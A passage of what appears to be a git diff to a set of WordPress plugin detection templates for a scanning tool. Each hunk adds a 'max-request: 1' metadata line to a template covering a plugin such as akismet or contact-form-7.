| 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/photo-gallery.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index e555bf93d3..425adf0bfe 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: + max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 